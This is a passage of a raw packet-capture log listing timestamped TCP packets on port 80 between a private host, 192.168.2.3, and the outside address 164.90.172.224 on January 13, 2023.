                                    Jan 13, 2023 05:12:09.897262096 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897262096 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897294998 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897315025 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897340059 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897377014 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897386074 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897423983 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897432089 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897454977 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897479057 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897490978 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897525072 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897572041 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897588968 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897588968 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897617102 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897640944 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897664070 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897680998 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897711039 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897756100 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897768021 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897768974 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897802114 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897821903 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897847891 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897875071 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897898912 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897929907 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897943974 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.897954941 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.897990942 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898037910 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898061037 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898061037 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898082018 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898106098 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898128986 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898148060 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898175955 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898195982 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898221016 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898268938 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898279905 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898279905 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898315907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898335934 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898360968 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898375034 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898407936 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898407936 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898453951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898499966 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898523092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898523092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898545980 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898567915 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898591042 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898608923 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898638964 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898648977 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898685932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898756027 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898756027 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898765087 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898809910 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898835897 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898854971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898904085 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898907900 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898909092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898947001 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898961067 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898993015 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899036884 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899055004 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899055004 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899082899 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899101019 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899127960 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899132013 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899173021 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899218082 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899234056 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899235010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899261951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899321079 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899322987 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899322987 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899363995 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899408102 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899425030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899425030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899451971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899475098 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899497986 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899503946 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899542093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899554968 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899586916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899630070 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899646044 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899646044 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899672985 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899698019 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899717093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899735928 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899760962 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899806023 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899813890 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899813890 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899851084 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899914980 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899919033 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899964094 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899965048 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899965048 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900010109 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900021076 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900054932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900100946 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900113106 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900113106 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900146008 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900191069 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900216103 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900217056 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900233984 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900244951 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900279045 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900299072 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900324106 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900369883 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900379896 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900381088 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900413036 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900460958 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900479078 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900479078 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900505066 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900520086 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900548935 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900572062 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900593996 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900639057 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900649071 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900649071 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900681973 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900727034 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900739908 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900739908 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900770903 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900785923 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900815964 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900825024 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900862932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900909901 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900947094 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900947094 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.900954008 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900998116 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.900998116 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901021004 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901042938 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901058912 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901088953 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901109934 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901133060 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901176929 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901197910 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901197910 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901221037 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901257992 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901267052 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901282072 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901312113 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901324034 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901355982 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901371956 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901402950 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901448965 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901468039 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901468039 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901493073 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901509047 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901537895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901561022 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901583910 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901602030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901627064 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901645899 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901671886 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901686907 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901716948 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901761055 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901767969 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901804924 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901806116 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901850939 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901865959 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901865959 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901901007 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901916027 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.901946068 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.901989937 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902014971 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902015924 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902034044 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902050972 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902080059 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902117968 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902124882 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902170897 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902183056 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902184010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902215004 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902261019 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902276039 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902276993 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902304888 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902331114 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902348995 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902381897 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902394056 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902407885 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902440071 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902487040 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902497053 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902497053 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902532101 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902575970 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902599096 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902600050 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902621984 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.902633905 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.902687073 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.920576096 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.920681000 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932640076 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932706118 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932753086 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932763100 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932763100 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932806969 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932816029 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932859898 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932876110 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932914019 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932931900 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.932960033 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.932975054 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933007002 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933021069 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933053017 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933070898 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933099985 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933120966 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933147907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933162928 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933196068 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933211088 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933242083 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933259010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933288097 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933303118 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933334112 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933348894 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933378935 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933394909 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933424950 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933439970 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933473110 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933485985 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933517933 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933531046 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933564901 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933576107 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933609009 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933629036 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933655024 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933666945 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933702946 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933713913 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933748007 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933760881 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933794022 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.933806896 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.933974028 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.963839054 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.963912964 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.963963032 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964008093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964052916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964062929 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964099884 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964139938 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964145899 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964190960 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964190960 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964236021 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964270115 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964279890 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964324951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964338064 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964369059 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964411974 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964445114 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964456081 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964500904 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964517117 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964545012 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964587927 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964601040 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964632034 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964674950 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964698076 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964720011 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964764118 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964781046 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964807034 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964852095 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964906931 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964906931 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964951992 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.964979887 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.964997053 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965039968 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965078115 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.965084076 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965126991 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965148926 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.965169907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965214968 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965231895 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.965256929 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.965322018 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.965401888 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.995707989 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.271341085 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.301497936 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.301598072 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.301784992 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.331623077 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.333707094 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.337882996 CET4969980192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:26.367909908 CET8049699164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:26.368016958 CET4969980192.168.2.3164.90.172.224
